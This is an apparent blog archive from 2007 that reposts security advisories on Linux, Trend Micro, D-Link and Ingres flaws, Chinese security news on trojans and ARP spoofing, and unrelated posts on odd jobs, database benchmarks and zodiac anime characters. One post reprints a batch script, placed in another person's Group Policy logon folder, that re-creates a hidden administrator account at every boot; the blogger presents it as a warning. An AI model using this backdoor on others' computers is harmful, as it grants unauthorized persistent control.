Linux Kernel "sysfs_readdir()" Denial of Service      

Secunia Advisory:  SA25771    


Release Date:  2007-06-26 

Critical: 

Not critical 


Impact:  DoS


Where:  Local system


Solution Status:  Unpatched 

OS: Linux Kernel 2.6.x


CVE reference: CVE-2007-3104 (Secunia mirror)

Description:


A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a Denial of Service (DoS).

The vulnerability is caused due to a NULL pointer dereference within the function "sysfs_readdir()" when handling pointers to inodes. This can be exploited to crash a vulnerable system.

Solution:


Restrict access to trusted users only.

Provided and/or discovered by:


Reported in a Red Hat advisory.


jason0936 發表在 痞客邦 留言(0) 人氣()

Trend Micro OfficeScan CGI Modules Buffer Overflow and Authentication Bypass      

Secunia Advisory:  SA25778    


Release Date:  2007-06-26 


Critical:  Moderately critical 

Impact:  Security Bypass   System access


Where:  From local network

Solution Status:  Vendor Patch


Software: Trend Micro OfficeScan Corporate Edition 8.x

Description:


Two vulnerabilities have been reported in Trend Micro OfficeScan, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system.

1) A boundary error within a CGI module can be exploited to cause a buffer overflow and execute arbitrary code.

2) An unspecified error within a CGI module can be exploited to bypass the authentication mechanism of the OfficeScan Management Console via a specially crafted HTTP header.

The vulnerabilities affect OfficeScan Corporate Edition version 8.0.

Solution:


Apply Security Patch - Build 1042:


http://www.trendmicro.com/ftp/product...sce_80_win_en_securitypatch_b1042.exe

Provided and/or discovered by:


Reported by the vendor.


jason0936 發表在 痞客邦 留言(0) 人氣()

D-Link DPH-540 / DPH-541 Spoofing and Denial of Service Vulnerabilities      

Secunia Advisory:  SA25803    


Release Date:  2007-06-26 


Critical: 

Less critical 


Impact:  Spoofing     DoS

Where:  From remote


Solution Status:  Unpatched 


OS: D-Link DPH-540 Wi-Fi Phone

  D-Link DPH-541 Wi-Fi Phone

CVE reference: CVE-2007-3347


CVE-2007-3348

Description:


Sipera VIPER Lab has reported two vulnerabilities in the D-Link DPH-540 and DPH-541 Wi-Fi phones, which can be exploited by malicious people to conduct spoofing attacks or to cause a DoS (Denial of Service).

1) The SIP stack accepts SIP INVITE messages from source IP addresses other than the Call Server’s IP address. This can be exploited to send messages directly to the phone and e.g. spoof the caller ID.

 

2) An error in the handling of SIP INVITE messages can be exploited to prevent the phone from making or receiving calls via a specially crafted SIP INVITE message containing a malformed SDP header.

The vulnerabilities are reported in firmware 1.00.14. Other versions may also be affected.

Solution:


Use the device in a trusted network environment only.


Provided and/or discovered by:


Sipera VIPER Lab


jason0936 發表在 痞客邦 留言(0) 人氣()

中國網路發佈--網上炒股需小心 股民安全八大注意

2007062514:31 來源:人民網   

近日,由於股票市場的持續火爆,使得越來越多的新股民進入股市。據有關部門統計,目前每13個中國人就有1個炒股、每天A股開戶數新增30萬戶,我國已進入“全民皆股”時代。而網上炒股以其“交易方便快捷、信息量大,緊跟行情、輔助分析系統強大”等特點成為股民炒股的首選方式。

但據專家介紹,由於大多數股民缺乏基本的防護意識和措施,使網上炒股面臨極大的安全風險。

  瑞星安全專家介紹,這些安全性漏洞主要存在於用戶自己的電腦中,銀行、證券公司的系統相對要安全一些,而駭客往往採取以下幾種手段來攻擊用戶。

  一、網上詐騙(又稱網路釣魚)


 

  所謂“網上詐騙”,就是駭客實現建立一個與正常網站幾乎一模一樣的假冒網站,同時申請一個與正常網站相近的功能變數名稱。當用戶輸入錯網址後,就會被引入到這個虛假的網站。一旦用戶在這個假網站中輸入自己的帳號、密碼,這些資訊就會被駭客竊取。

  同時,一些病毒感染使用者電腦後也會彈出假冒的視窗,引誘使用者輸入隱私資訊,達到相同的目的。


 

  二、採用病毒、木馬攻擊


  2006年,瑞星共截獲新病毒23萬之多,其中約90%的病毒是以直接或者間接獲取經濟利益為目的編寫的,其中則有大量針對網路銀行、網上證券系統編寫的病毒。

  這類病毒的基本原則是“只偷竊不破壞”,因此有著很大的隱蔽性。使用者的電腦感染這類病毒後,沒有明顯的發作特徵,使用者幾乎察覺不到被病毒感染,而這些病毒則在後臺悄悄地運行,當使用者登錄網路銀行、證券系統時自動記錄輸入的資訊,並將這些資訊發送給駭客。

  三、猜解密碼


  很多使用者的密碼設置的非常簡單,採用“123456”或者用生日做為密碼的大有人在。還有一些使用者害怕忘記密碼,而將它們寫在Word文檔中,任何人只要使用其電腦 就可以看到他的密碼。這些都給駭客的攻擊帶來便利。

  對此,瑞星安全專家提出了“網上炒股的八大注意事項”:

  第一、必須安裝殺毒軟體並且做到每天至少升級一次


  目前,瑞星每天截獲的新病毒數量成百上千。為了對付這些新增病毒,瑞星殺毒軟 件每天常規升級三次。使用者只有及時升級殺毒軟體才能有效查殺這些新增的病毒,因此, 安全專家建議用戶每天至少升級一次殺毒軟體。

 

  第二、必須打開殺毒軟體的即時監控和個人防火牆


  一些用戶由於缺乏必要的安全防護知識,在遇到殺毒軟體發現病毒攻擊時往往不知
所措,還有一些使用者覺得殺毒軟體和防火牆的經常彈出提示資訊比較麻煩,乾脆將它們 關閉。這些都給駭客的攻擊帶來了便利。

 

  第三、安裝卡卡上網安全助手
     (這似乎是廣告)


  用戶可以在瑞星的卡卡網站(http://tool.ikaka.com)免費下載使用該軟體。卡卡助手具有防範網路詐騙的功能,當用戶不小心打開假冒的網路銀行、網上證券網站時會自動進行攔截並提示用戶。同時,卡卡獨家的“IE防漏牆”模組還可以阻止絕大部分病毒通過流覽器漏洞侵入使用者的電腦。

  第四、使用帶有USB KEY的網路銀行專業版進行交易
        (AV病毒就是靠USB,所以USB最近不安全管道)


  通常,網路銀行專業版在安全特性上要比基於流覽器的簡易版網路銀行高,因此建議使用者安裝專業版本的網路銀行系統進行交易。新使用者儘量使用帶有USB KEY加密的硬體專業版,這種專業版會由硬體生成金鑰,並且金鑰無法複製出USB硬體,從而大大提高了安全程度,如招商銀行的“優key”、工商銀行的“USB KEY”等。

  第五、到證券公司的官方網站下載炒股軟體
      (也要確認官方網站是否為真正官方站/或是有被入侵的訊息 )


  一些不正規網站上的炒股軟體存在被駭客攻擊,放入病毒、木馬的風險,因此,使用者在使用炒股軟體時一定要從國泰君安、中信證券等的官方網站下載。

  第六、充分利用瑞星個人防火牆的“密碼保護”功能
     (這還是是廣告)


  瑞星獨有的“木馬牆”技術可以阻止病毒、木馬竊取使用者網上銀行、網上證券軟體的帳號和密碼,即使使用者電腦上感染了新的未知病毒,也同樣能夠起到保護作用。該技術應用在瑞星個人防火牆的“密碼保護”模組中,使用者安裝個人防火牆之後,直接將網上銀行、證券軟體的快捷方式添加到“密碼保護”中即可。

  第七、設置較為複雜的密碼


  簡單的密碼容易被駭客破解,因此建議股民朋友不要使用生日、電話號碼、門牌號或類似“123456”等帶有明顯規律的密碼。同時,股票帳戶和銀證通帳戶的密碼不要保存在電腦上。

  第八、儘量不要在網吧等公共電腦上炒股


  由於公共電腦的安全防範措施不高,往往會存在病毒、木馬,這都給網上炒股帶來風險。如果必須使用此類電腦,則在進行網上交易前必須先對電腦進行查毒,同時,在完成交易後一定要退出交易系統,以免造成股票和帳戶資金損失。


jason0936 發表在 痞客邦 留言(0) 人氣()

http://tech.china.com/zh_cn/news/safe/895/20070625/14181197.html&cid=1113992134&ei=54t_Rp-jK4PCqgOFtewm
AV終結者引發木馬氾濫 反木馬行動迫在眉睫

2007-06-25 16:23:48

    近日,關於“AV終結者”病毒的討伐聲不斷,大量使用者深受該病毒的侵害。昨日,金山毒霸反病毒專家再次指出:“AV終結者”的危害才剛剛開始。反病毒專家戴光劍表示,這個被稱為史上最牛的木馬下載器的“AV終結者”病毒,其最大的危害並非病毒本身,而是引發了新一輪木馬病毒的氾濫。
    
    據悉,“AV終結者”病毒已經在互聯網上肆虐數日,然而由於該病毒的隱蔽性極高,大量使用者甚至感染了該病毒也毫無察覺。而使用者電腦的安全系統就是在不知不覺中被徹底破壞,電腦完全處於“裸奔”狀態,而此時面對大量魚貫而來的木馬病毒,使用者的電腦已經失去了任何“抵抗力”。
    
    使用者劉先生有玩網路遊戲的習慣,每天下班後都會玩上2個小時。“昨天我剛剛的登陸到遊戲,發現自己辛苦贏回來的遊戲裝備全部不翼而飛,裡面還包含了一些價值萬元的高級裝備。”而後,劉先生企圖通過QQ向好友求助,結果發現連QQ也無法登陸。
    
    根據劉先生的描述,金山毒霸反病毒工程師們的第一反應就是劉先生的電腦被植入了木馬病毒。然而經過進一步查看,發現劉先生電腦內的殺毒軟體根本就沒有被開啟,也就是說劉先生的電腦完全是一台“裸機”,此種現象引發的工程師的高度重視,經過仔細分析,“AV終結者”病毒浮出水面。
    
    為了説明劉先生清除電腦內的病毒,金山毒霸反病毒工程師首先在一台正常的機器上登陸www.duba.net下載了一個“AV終結者”專殺工具,而後通過U盤連接到劉先生的機器上,幾分鐘後,“AV終結者”被清除。工程師重新開機殺毒軟體進行全面查毒,結果查殺結果讓劉先生瞠目結舌,竟然在自己的電腦內查出68個木馬病毒。
    
    金山毒霸反病毒專家戴光劍表示,“經濟利益”毫無疑問已經成為病毒製造者最大的驅動力,而木馬正是實現這一非法得利的主要手段。在06年截獲的各類病毒中,專門盜取網銀、網遊等網路財產和QQ號的木馬占了51%,這類病毒相對去年有明顯增長,已經成為眾多線民面臨的第一大威脅。
    
    業內人士指出,病毒製造者已經不再是以炫耀自己的技術為目的,也不再是單打獨鬥,而是結成了團夥,有的人負責盜取銀行或網遊帳號,有的人負責銷贓,從而形成了一整條的黑色產業鏈,如果任期發展下去,整個互聯網安全將面臨嚴峻威脅,因此反木馬已經成為各大反病毒廠商的首要任務。


jason0936 發表在 痞客邦 留言(0) 人氣()

10大最難忍受工作:垃圾堆尋寶 鯨屁股逐臭 替微軟補丁

鉅亨網鉅亨網查淑妝 2007-06-23 14:54

 

 

什麼樣的工作最叫人難以忍受?追在鯨魚屁股後邊尋找糞便;翻查大量腐爛的垃圾,尋找人類的消費模式;趴在長滿蛆蟲的屍體旁,試圖發現謀殺者的蛛絲馬跡;盯著全球最優秀的運動員小便;給世界上最大的陸地動物人工結紮,還有每天替被駭客入侵的微軟修補軟體的安全專家…。

據新華網報導,美國《大眾科學》近日評出「2007 年10大最難忍受的科學工作」,這些常人無法想像也難以忍受的工作,卻是很多科學工作者的日常工作。



1.危險環境潛水員--他們在下水道一樣又臟又臭的環境中游泳
史蒂文·M·巴斯基是《在高危險環境潛水》一書的作者,這本書被稱為危險環境打撈業的聖經。巴斯基說,他見過的最糟糕的一次打撈經歷發生在一個養豬場,有個人駕駛卡車掉進了一個廢水塘,沉了下去。水中不僅充斥著尿液和被泡稀了的豬糞,而且還有養豬場主傾倒的為豬注射抗生素的針頭。但是必須有人打撈落水者的屍體,而這項任務就落在職業打撈人身上。

這些潛水員還要遊進水下垃圾堆、核反應爐、有毒傾瀉物和污水溝中。這些全都是非常危險的工作,一旦潛水服被劃破,細菌和有毒物質就會侵入人體。專家表示,儘管幹這一行收入很高,趕得上會計師的收入,但是由於需要掌握化學、醫學、生物學以及其他各類知識,所以能勝任這項工作的人並不多。

2.海洋學家--他們在被污染的海洋裏工作,每天都會面臨中毒的危險
全世界的海岸線已經出現了200多處缺氧的「死亡區」,而2004年這種死亡區的數目僅為149處。更為嚴重的是,如果全球變暖果真像科學家們所預測的那樣,那麼海洋二氧化碳量的增加將會令海水酸化,令海洋生物難以存活。時不我待,有責任心的海洋學家們必須現在就開始做大量工作。

非營利性組織「藍色海洋協會」的創辦者卡爾‧薩菲納非常自豪自己的工作。他說,人類活動正「將海洋變成一種有毒的環境」,海洋學家需要穿上防毒衣才能工作。不久前,澳大利亞海洋生物學家羅恩‧約翰斯通在研究海洋沉積物時因為接觸一種海草而中毒,渾身長滿癤瘡。

3.大象絕育師--他們的病人是地球上最大的陸地動物,卻要為它做人工結紮手術
什麼東西長達0.3米,外面還覆輓?釐米厚的皮膚、10釐米厚的脂肪,25釐米厚的肌肉?那是大象的睪丸。如何給這樣一個龐然大物做絕育手術?獸醫馬克‧斯代特發明瞭一個新工具--在視頻監視器上接一段1.2米長的腹腔纖維鏡。

斯代特是佛羅里達「迪斯尼動物王國」的首席醫生,由於非洲野生動物園的大象繁殖太快,棲居地已經不能滿足其食物需要,為了維持生態平衡,必須對大象施行結紮絕育手術。

去年夏天斯代特開始試驗自己的這個發明。他和工作人員先從直升機上射出飛鏢打穿大象的厚皮施以麻醉,然後用吊車將沉睡的大象立著吊起來,在它身上切開 10釐米深的口子,然後將腹腔鏡插進其腹腔靠近生殖器官的地方(大象的睪丸像卵巢一樣是長在體內的)。通過腹腔鏡,斯代特對4頭公象成布I行了結紮手術。

4.垃圾研究員--他們愛翻垃圾,樂此不疲
斯坦福大學的威廉‧拉特耶自稱是「垃圾學家」,腐臭的垃圾對他來說卻是寶藏。自1973年以來,拉特耶已經翻過至少12萬公斤垃圾,用以分析研究現代消費模式以及垃圾分解的速度。

拉特耶的工作方式一般是在垃圾場挖15到20個井,井深直達垃圾堆最底部,有時達27米深,從每個井裏挖出20-30噸垃圾,然後帶領學生進行垃圾分類。

他發現了什麼呢?髒尿布佔了垃圾場垃圾總量的不到2%,而紙張佔45%;熱狗可以在垃圾堆裏堅持24年而不分解……這些都是非常有趣而實用的資訊。

5.動物標本製作員--他們殺死大大小小的動物,然後腌製這些動物屍體,裝在瓶子裏
記得在中學的生物課上,老師從甲醛溶液裏拿出泡製的死青蛙時,你聞到的那股味道嗎?你能想像1週5天、1天8個小時一直聞著這股味道嗎?而動物標本製作員就在天天受著這樣的折磨。

他們將蠕蟲、青蛙、貓、鴿子、鯊魚、蟑螂毒死,用防腐劑腌制在玻璃瓶裏,供中學和大學生生物課上做試驗用。跳蚤和蟑螂等昆蟲的處理是最容易的,只需要投進酒精瓶即可。而鴿子和青蛙必須立即施行「安樂死」。

6.微軟安全專家--他們頭上貼著一個標簽:黑我吧!
負責微軟產品安全的專家們1年大約收到10萬個電子郵件,每一個都傳遞這樣一個資訊「微軟帝國的某一處發生了問題,需要滅火。」

微軟安全反應中心的工作人員一年365天都在忙於修補各種軟體。這是一項單調乏味的工作。每個產品都有不同語言的不同版本,每一個版本都需要自己的補丁。駭客們對微軟產品發起無情的攻擊。據美國一個電腦安全組織稱,微軟產品是線上攻擊的五大目標之一。

7.重力研究對象--他們被捆綁在機器上遭受地心引力的折磨
在外太空的失重狀態下,人的臉會變得浮腫,肌肉會發生萎縮。研究人員希望為長期太空旅行的人消除這些症狀。然而,模倣失重狀態效果的唯一途徑是讓研究對象倒豎著躺上幾個星期。

美國太空總署的研究人員莉茲‧沃倫設法說服了15 位男士,讓他們在床上豎著躺了21天。他們頭朝下以6 度角的傾斜度安靜地躺著。這些研究對象只能在便盆裏方便,偶爾會被推到一個公共區域,與其他同樣姿勢臥床的同伴聊聊天。而且,技術人員每天還要將他們綁在模擬重力的離心分離機上,旋轉著甩上1小時。
儘管堅持21天能獲得6000美元的報酬,但是過程很難受。

8.奧運會藥檢員--他們對世界上最優秀的運動員進行尿檢
隨著運動員服用興奮劑的案例越來越多,每次奧運會都需要對運動員進行嚴格的尿樣檢查。為了迎接2008 年在北京舉行的奧運會,藥物檢測員需要監督運動員將尿液尿到樣杯裏,21天下來,將取樣4000次。

藥檢員的壓力也很大,現在為了提高比賽成績而研製的興奮劑藥物威力越來越大,檢測難度也越來越大。加拿大西安大略省生物倫理學家肯尼斯‧科克伍德說:「等藥檢員知道一種藥物的存在時,往往已經是過去時了。那些教練和帶隊醫生翻齒U種醫學文獻尋找新奇的藥方。藥檢員甚至不知道該檢測什麼。」

9.法醫昆蟲學家--他們透過研究蛆蟲來找到謀殺者
尼爾‧哈斯克爾是美國首屈一指的法醫昆蟲學家,至今已經研究過700具長滿蛆蟲的屍體,在100樁殺人案中出庭作證,併為美國的執法部門撰寫了第一本法醫昆蟲學著作。

在全美,有20多個像他一樣的研究者,他們主要透過觀察蒼蠅的卵、蛆蟲、蛹和蒼蠅成蟲的生長時間來計算屍體從死亡到被發現的時間。哈斯克爾說,他參與檢驗的第一具屍體竟是一個經常一起共進早尷獐穭H,他的牙齒和眼睛裏都爬滿了蛆蟲,但出於職業習慣,他並沒有感到害怕或者噁心,而是充滿了研究的渴望。

10.鯨糞研究員--他們鏟起鯨魚的糞便,然後從其中挖掘線索
波士頓「新英格蘭水族館」的高級研究員羅莎琳德 ‧羅蘭每天的一項例行工作是帶著幾名助手,在靠近加拿大的海灘上搜尋北大西洋脊美鯨的蹤跡,確切地說,他們尋找的是脊美鯨糞便的蹤跡。

羅蘭最近發表了迄今為止關於脊美鯨的最詳盡的研究報告。羅蘭說:「可以透過糞便看鯨有無懷孕,測量其荷爾蒙水準及身體毒素,檢查其遺傳學特徵。甚至可以通過糞便區分不同的鯨。」

鯨糞被排出後一般可以在海面上漂浮1個小時,羅蘭和助手們就用特製的網子小心翼翼地撈起這些或呈褐色或呈鮮橙色的鯨糞,最大的糞塊可能近0.5公斤重。
在羅蘭的帶動下,其他研究鯨的科學家也開始研究鯨糞。澳大利亞科學家尼克‧遣葩聒晹足假臚@個拍下鯨排便過程的科學家。那是一頭小鬚鯨,它排出一大堆像巨大水母那樣的泡沫,拖在身後。遣葩絰﹛A他們一拍完照就趕緊駕船跑了,因為鯨糞實在太臭了。


jason0936 發表在 痞客邦 留言(0) 人氣()

MySQL,PostgreSQL、Firebird 三種資料庫大評比
這次日本(高橋 信頼=ITpro 報導資料庫評比
一律以免費資料庫平台比較效能,本次比較產品有MySQL,PostgreSQL、Firebird 三種資料庫,以資料庫命令對於三種不同大小資料量,計算出效能值最短(處理速度最快)比較以下為平均比較參考值:

INSERT:  Firebird     <    MySQL             <   PostgreSQL
SELECT: Firebird     <   PostgreSQL     <   MySQL   
UPDATE: Firebird     <   MySQL              <   PostgreSQL  
DELETE: Firebird     <   PostgreSQL     <   MySQL  

以下為原文:
http://feeds.nikkeibp.co.jp/itpro_all?m=6658
「MySQL,PostgreSQLとFirebirdの性能をユーザー会メンバーが徹底比較,判明した"意外な結果”」--OSC2007.DBより    オープンソースカンファレンス2007.DBの会場

左から日本MySQLユーザ会の堤井泰志氏,Firebird日本ユーザー会の木村明治氏,日本PostgreSQLユーザ会の片岡裕生氏
 「更新とJOINが多ければMySQL,シンプルなSELECT主体ならPostgreSQLが向いている。ストアド・プロシージャでシングル・コネクションならFirebirdは非常に速い」---6月23日に開催された「オープンソースカンファレンス2007.DB(OSC2007.DB)」で,各オープンソースDBのコミュニティのメンバーによる性能比較が披露され,従来の一般的なイメージとは異なる“意外な結果”が明らかにされた。

 オープンソースカンファレンスは,オープンソース関連コミュニティが主催するイベントで,OSC2007.DBはデータベース関連のコミュニティが集まったイベントである。性能比較セッションを担当したのは,日本MySQLユーザ会の堤井泰志氏,日本PostgreSQLユーザ会の片岡裕生氏,Firebird日本ユーザー会の木村明治氏。「あくまでボランティアによる性能比較であって,最速,最新マシンの上で実施したわけではない。数値を絶対視するのではなく,各DBの特徴や得手不得手を理解するために参考にしてほしい」(堤井氏)。

 まず単体テストとしてストアド・プロシージャを使ったテストを行った。マシンは動作周波数2.4GHzのPentium4,メモリーは1Gバイト,ハードディスクはIDE ATA100 7200rpm 60Gバイトと,現在としては決してハイエンドのマシンではない。データベースのバージョンはMySQLが5.0.6-beta(エンジンはInnoDB),PostgreSQLは8.1,Firebirdは2.0.1である。

 検証の結果,一般的に持たれているイメージと異なり,MySQLでのJOIN,PostgreSQLの検索は速いことが示された。またMySQLの場合,デフォルトのエンジンであるMyISAMに比べ,トランザクション機能を持つInnoDBの性能は必ずしも遅くないという,これも意外な結果が得られた。またFirebirdは,MySQLとPostgreSQLに比べ全般に高速だった。ただし,「MySQL,PostgreSQLは500コネクション以上のかなりの負荷に耐える」(堤井氏)。

 またこのほかにCやJava,PHPからアクセスしたテストの結果なども紹介した。

 測定結果を踏まえたデータベースの選択基準として,堤井氏らは「ストアド・プロシージャが使える状況で,シングル・コネクションならFirebird。更新がそれなりにあり,JOINが多ければMySQL,シンプルなSELECT主体ならPostgreSQLが向いている」と指摘した。


jason0936 發表在 痞客邦 留言(0) 人氣()

想取得資訊何其容易,本日中國紅網新聞中就教授大家「如何建立一個,不被殺掉,並擁有最大管理者權限帳號」這其實也是當惡意人士基礎入侵後,第一件要作或是嘗試要作的事,就是取得本地端權限,往往可以透過很多方法,最常見的就是以郵件或是各種可供程式啟動弱點,讓受害者不知情下作這件事情(莫名其妙就被人建立最大管理者),以下為本文(沒有打馬賽克是因為本文章為尊重新聞來源,但請勿以以下程序作非法用途,)

 

http://tech.rednet.cn/c/2007/06/25/1238379.htm

別人永遠刪不掉 建立管理員用戶小竅門

http://www.rednet.cn  2007-6-25 9:50:08  紅網 

操作步驟:

1、在自己電腦裡面建立一個.txt文字檔.

2、在裡面輸入內容

@echo off

net user xixi 123456 /add

net localgroup administrators xixi /add

        (注釋:前面xixi是用戶名,後面123456是密碼;)

3、把這個檔保存,更改尾碼為xixi.bat 注釋:前面名字隨便,後面格式一定要是bat

4、把這個檔拷貝到對方電腦C:\WINNT\system32\GroupPolicy\User\Scripts\Logon檔目錄下,沒有的話自己創建。

完成,下次對方電腦無論如何都有這個管理員帳號,刪除了,下次啟動還有!

 

如果把裡面的內容改成

@echo off

net user administrator 123456 /add

意思是不管你怎麼改,下次啟動管理員帳號administrator密碼一直是123456

[稿源:賽迪網]

[作者:smtk]

[編輯:龔鎮威]

jason0936 發表在 痞客邦 留言(0) 人氣()

http://www.pconline.com.cn/pcedu/softnews/yejie/0706/1041895.html&cid=1113916503&ei=Sil_Rsq9HYnSqQPJsZEp

XP最安全?Vista未修復漏洞比XP要多得多

出處:PConline[ 2007-06-25 10:02:50 ]  作者:BlackWing  責任編輯:zhonghongfei

  微軟稱其Vista作業系統比LinuxOS X要安全得多,詳情見“微軟自稱VistaLinuxOS X要安全得多”一文,但事實並非那麼簡單。

微軟某安全方面的執行官在上週末公佈的資料顯示,Vista推出六個月後,剩下沒有修復的漏洞數比Windows XP要多。

Vista從去年11月底上市以來,一共爆出了27個隱患,而微軟只修復了其中的12個。於此對比,在XP推出六個月後總共發現的39bug中有36個已經被修復。

微軟安全性原則主管上周公佈了這些資料,他表示總的來說VistaXP表現要好。但是他並沒有對Vista留下大量未修復隱患問題進行解析,只是表示大部分未修復的漏洞都是非高危隱患,只有一個高危隱患未被修復,而在XP的首發六個月後,還剩下兩個高危漏洞未被修復。

于此同時形成對比的是,在XP推出六個月後一共修復了23個高危bug,而Vista中只有一個。

微軟有報喜不報憂的嫌疑,不少企業都認為
Vista並不如微軟所說的那麼安全,所以暫時還沒計畫遷移到Vista上。


jason0936 發表在 痞客邦 留言(0) 人氣()

CA產品後端資料庫 Ingres Database出現多種弱點
已經發現的弱點包括會造成緩衝區溢位等方式,
指向攻擊資料庫通訊模組(iigcc.exe )與資料傳遞模組(iigcd.exe)

進而提升權限,從遠端入侵執行任何程式。

影響範圍包括:
Ingres Database 3.0.3
CA eTrust Secure Content Manager r8  Windows版本

CVE編號:
CVE-2007-3334


Public Advisory: 06.21.07 
Ingres Database Multiple Heap Corruption Vulnerabilities



I. BACKGROUND
Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs.

http://www3.ca.com/solutions/Product.aspx?ID=1013  


http://www.ingres.com/


II. DESCRIPTION
Remote exploitation of multiple heap overflow vulnerabilities in Ingres Database Server as distributed with Computer Associates International Inc.'s (CA) products may allow attackers to execute arbitrary code with SYSTEM privileges.

The vulnerabilities exist in the Communications Server (iigcc.exe) and Data Access Server (iigcd.exe) components of Ingres. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.

The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.

III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).

Exploitation has been demonstrated to be trivial.

IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Ingres Database 3.0.3 as included with CA eTrust Secure Content Manager r8 on Windows. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.

V. WORKAROUND
Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.

VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.

 

http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.Asp


VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.


jason0936 發表在 痞客邦 留言(0) 人氣()

美軍方表態Google Earth威脅安全

http://www.sina.com.cn 2007年06月24日 09:36  賽迪網

【賽迪網訊】6月24日消息,據國外媒體報導,美國空軍情報、監察與測繪(AF ISR)部門副參謀長Lt. Gen. David Deptula日前表示,Google Earth等網路地圖軟體已經對安全構成了威脅。

  Deptula稱,Google Earth等網路地圖軟體所提供的資料已經對安全構成了威脅。他說:“現在談威脅已經沒有什麼意義了,因為它已經的的確確存在了。而且,也沒有人想撤回這些商業微星圖片。”

  Deptula說:“一個人,只要拿著一張信用卡,就可以在地球的任何一個角落獲得所需要的圖片,這是非常害怕的。對於以前由重兵把守的秘密場所,現在每個人都通過網路來訪問。”

  當被問及“美國軍方是否將對某些軍事重地的圖片進行限制”時,Deptula稱並不瞭解這方面情況。不久前,Google Earth剛剛推出了“街道流覽”功能,允許用戶360度流覽某一特定場所。據悉,該服務連 蘋果CEO史蒂夫•約伯斯的房間都看得一清二楚。


jason0936 發表在 痞客邦 留言(0) 人氣()

12星座的代表動漫人物

 白羊座代表人物:櫻木花道《灌籃高手》

做事積極,熱情有活力,講義氣,樂觀進取有自信,
勇於接受新觀念,有明快的決斷力,坦白率真,
爆發力強,勇於接受挑戰,不畏權威。
評點:火暴。
金牛座代表人物:景麒《十二國記》

高貴,有藝術氣質,沉穩,仁慈,謹慎,溫和,體貼,
意志堅定,友情,有耐心,責任感強,可靠,
古板,缺乏應變力,缺乏信心。
評點:可靠。
雙子座代表人物:草摩紫吳《水果籃子》

適應力強,機智,敏捷,主動,健談,
聰慧且多才多藝,具有寫作和語言方面的天才,
善變,雙重性格,狡猾,不安份。
評點:善變
巨蟹座代表人物:大石《網球王子》

具有強烈的父性母性本能,保護色彩濃重,重視安定和和諧,有包容力,體貼,親切溫暖,有同情心,
提不起放不下,太過多愁善感,不直接。
評點:溫和。
獅子座代表人物:聞仲《封神演義》

天生是領導人才,精力充沛,能控制場面,慷慨,
具有創新的能力,主觀意識太強,自以為是,
自視過高,勢利,權力欲過強。
評點:霸氣。
處女座代表人物:穆先生《聖鬥士星矢》

謙虛,喜歡整潔,處事小心,頭腦清晰而分析力強。
評點:完美。
天秤座代表人物:藏馬《幽游白書》

外型高雅,擅長交際,個性平易近人,注重羅曼蒂克的浪漫情調,是理想主義者,具有迷人的性格特徵,對和諧而愉快的生活環境十分珍惜。
評點:優雅。
天蠍座代表人物:赤屍藏人《閃靈二人組》

冷靜,精明,忠於自己。
評點:神秘。
射手座代表人物:犽羽獠《城市獵人》

樂觀,活潑,有很高的智慧,思想開朗,
適應力強,有很好的判斷力,富崇高的正義感,喜愛自由,
可靠,慎重,花心。
評點:花心。
魔羯座代表人物:手塚國光《網球王子》

保守,謹慎,實際,有責任感,可靠,機智,有主見,
尊敬權威,看重自己,謹慎,有抱負,有耐心,守紀律。
評點:認真。
水瓶座代表人物:仙道《灌籃高手》

崇尚自由,**,博愛,友善,頭腦敏銳,善於觀察,
不按理出牌,思想多變,缺乏熱情。
評點:自由。
雙魚座代表人物:SAI《棋魂》

天真,溫柔而富直覺,謙虛,敏感,善解人意,
感情豐富,適應力強,仁慈,富有同情心

jason0936 發表在 痞客邦 留言(0) 人氣()

http://news.sina.com.tw/tech/sinacn/cn/2007-06-24/163538170315.shtml
ARP位址欺騙病毒出現新變種

北京新浪網 (2007-06-24 16:35)
 
  新華網天津6月24日電 (記者 張建新 薛飛) 國家電腦病毒應急處理中心24日預報說,6月25日至7月1日一周內將要定期發作的電腦病毒都沒有大的影響。但近期一些局域網用戶遭受了『ARP位址欺騙』病毒新變種的感染。

  據介紹,該病毒變種除具備以往ARP病毒發作的特徵,如局域網內部分電腦不能正常上網,或是所有電腦均不能上網,還有無法打開Web網頁或打開Web網頁速度較慢以及局域網鏈結時斷時續並且網速較慢等現象以外,還會向局域網內發送偽造的ARP欺騙廣播,並將受感染的電腦系統偽裝成局域網閘道。當局域網中的電腦系統發出訪問Web網頁請求的時候,偽裝成閘道的電腦系統會把Web網頁下載下來並在其中添加一段惡意位址代碼一並發送給發出請求的電腦,造成該電腦系統訪問Web網站時會主動鏈結該惡意網址。

  如果作業系統存在漏洞,就會在訪問的電腦系統中植入木馬程式,使得電腦系統遭到進一步的破壞,最終導致整個局域網成為『殭尸網路』。

  國家電腦病毒應急處理中心建議廣大電腦用戶採取如下針對性防範措施:

  1、立即升級作業系統中的防病毒軟件和防火牆,同時打開『即時監控』功能,即時地攔截來自局域網路上的各種ARP病毒變種。

  2、立即下載微軟MS06-014和MS07-017兩個系統漏洞補丁程式,將補丁程式安裝到局域網路中存在這兩個漏洞的電腦系統中,防止病毒變種的感染和傳播。


jason0936 發表在 痞客邦 留言(0) 人氣()

隱私權保護組織:行動通訊裝置易遭窺探私密

更新日期:2007/06/24 14:05 記者:郭無患

